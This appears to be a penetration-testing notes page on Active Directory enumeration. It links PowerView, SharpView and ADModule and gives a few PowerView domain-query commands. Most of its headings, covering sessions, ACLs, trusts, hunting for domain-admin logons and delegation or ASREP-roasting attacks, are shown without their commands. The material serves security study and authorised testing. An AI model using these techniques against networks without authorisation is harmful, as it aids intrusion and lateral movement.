Enumeration

Tools

SharpView: https://github.com/tevora-threat/SharpView (aggressor https://github.com/tevora-threat/PowerView3-Aggressor)

PowerView: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 (tips https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) (dev: https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)

ADModule: https://github.com/samratashok/ADModule (To use ActiveDirectory module without installing RSAT, we can use Import-Module for the valid ActiveDirectory module DLL)

Domain

Get Domain

Get-NetDomain
Get-NetDomain -Domain domain.local

Get Domain SID 

Get-DomainSID 
Get-DomainSID -Domain domain.local

Get Domain Policy

Get-DomainPolicy
(Get-DomainPolicy)."system access"
(Get-DomainPolicy –domain moneycorp.local)."system access"

Get DCs

Users

Get a list of users in the current domain

Get a list of all properties for users within domain

Search for particular string in users attribute

Groups

Get all groups in current domain

Get all groups containing admin in current domain

Get members of domain admin group

Get the group membership for a user

Computers / Sessions

Get a list of computers in current domain

List all local groups on a machine (needs admin privs to query non-dc machines)

List members of local groups on a machine (needs admin privs on non-dc machines)

Get actively logged on users on target (needs admin rights on target)

Get locally logged on users on target (needs remote registry enabled (started by default on servers))

Get the last logged on user on target (needs admin rights and remote registry enabled)

Files

Find shares on hosts in current domain

Find sensitive files on computers within domain

Get all file servers of domain

GPO / OU

Get list of GPO in current domain

Get GPO which use restricted groups or groups.xml for interesting users

Get users which are in a local group of a machine using GPO

Find machines where given user is a member of a specific group

Get OUs in a Domain

Get GPO applied on an OU

ACLs

Get ACLs associated with a specific object

Get the ACLs associated with the specific prefix to be used for search

Get the ACLs associated with the specified LDAP path to be used for search

Search for interesting ACEs

Get the ACLs associated with the specified path

Trusts

Domain Trust Mapping

Forest Mapping

Get all domains in current forest

Get all global catalogues for the current forest

Map trusts of a forest

Scripts

Find all machines on the current domain where the current user has local admin access (This function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then use multi-threaded Invoke-CheckLocalAdminAccess on each machine. Logon events for all machines, loud!)

Find local admins on all machines of the domain (needs administrator privs on non-dc machines). (This function queries the DC of the current or provided domain for a list of computers (Get-NetComputer) and then use multi-threaded GetNetLocalGroup on each machine.)

Find computers where a domain admin (or specified user/group) has sessions. (This function queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using Get-NetGroupMember, gets a list of computers (Get-NetComputer) and list sessions and logged on users (GetNetSession/Get-NetLoggedon) from each machine).

Confirm admin access

Find computers where a domain admin is logged-in. (This option queries the DC of the current or provided domain for members of the given group (Domain Admins by default) using GetNetGroupMember, gets a list only of high traffic servers (DC, File Servers and Distributed File servers) for less traffic generation and list sessions and logged on users (Get-NetSession/Get-NetLoggedon) from each machine.)

PrivEsc

Unconstrained Delegation

Constrained Delegation

ASREP Roasting

Clear Passwords

PreviousOffensive PowershellNextBloodHound

Last updated

Was this helpful?